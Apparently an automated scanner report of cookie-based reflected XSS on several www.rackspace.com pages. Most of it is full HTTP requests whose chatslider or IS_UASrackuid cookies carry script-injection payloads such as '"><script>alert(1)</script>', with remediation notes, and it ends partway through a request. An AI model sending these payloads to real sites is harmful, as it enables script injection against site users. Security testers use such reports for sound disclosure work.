GET /information/events/index.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D3f1e2"%3balert(1)//0356efb5555; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7253d"><script>alert(1)</script>988ca7aaa5a was submitted in the chatslider cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /information/events/index.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D7253d"><script>alert(1)</script>988ca7aaa5a; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9811e"%3balert(1)//af4e59f1f5c was submitted in the IS_UASrackuid cookie. This input was echoed as 9811e";alert(1)//af4e59f1f5c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /information/events/rackgivesback.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f89811e"%3balert(1)//af4e59f1f5c; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 37424"><script>alert(1)</script>14d4878a5bf was submitted in the IS_UASrackuid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /information/events/rackgivesback.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f837424"><script>alert(1)</script>14d4878a5bf; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 290b8"%3balert(1)//22b50dc06d4 was submitted in the chatslider cookie. This input was echoed as 290b8";alert(1)//22b50dc06d4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /information/events/rackgivesback.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D290b8"%3balert(1)//22b50dc06d4; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c091f"><script>alert(1)</script>c56cc7604ab was submitted in the chatslider cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /information/events/rackgivesback.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=Dc091f"><script>alert(1)</script>c56cc7604ab; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7bd3e"><script>alert(1)</script>1f0d5c42fc2 was submitted in the IS_UASrackuid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /information/hosting101/index.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f87bd3e"><script>alert(1)</script>1f0d5c42fc2; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8b5d5"%3balert(1)//d07a48b879e was submitted in the IS_UASrackuid cookie. This input was echoed as 8b5d5";alert(1)//d07a48b879e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /information/hosting101/index.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f88b5d5"%3balert(1)//d07a48b879e; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5f9e8"%3balert(1)//40912b17317 was submitted in the chatslider cookie. This input was echoed as 5f9e8";alert(1)//40912b17317 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /information/hosting101/index.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D5f9e8"%3balert(1)//40912b17317; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 593d9"><script>alert(1)</script>c65e422337d was submitted in the chatslider cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /information/hosting101/index.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D593d9"><script>alert(1)</script>c65e422337d; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dd0c3"><script>alert(1)</script>65d19321712 was submitted in the IS_UASrackuid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /information/index.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8dd0c3"><script>alert(1)</script>65d19321712; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9267b"%3balert(1)//5ecfe7cac99 was submitted in the IS_UASrackuid cookie. This input was echoed as 9267b";alert(1)//5ecfe7cac99 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /information/index.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f89267b"%3balert(1)//5ecfe7cac99; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d3407"><script>alert(1)</script>7f3b67cd2a0 was submitted in the chatslider cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /information/index.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=Dd3407"><script>alert(1)</script>7f3b67cd2a0; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fcd85"%3balert(1)//23c8788f011 was submitted in the chatslider cookie. This input was echoed as fcd85";alert(1)//23c8788f011 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /information/index.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; 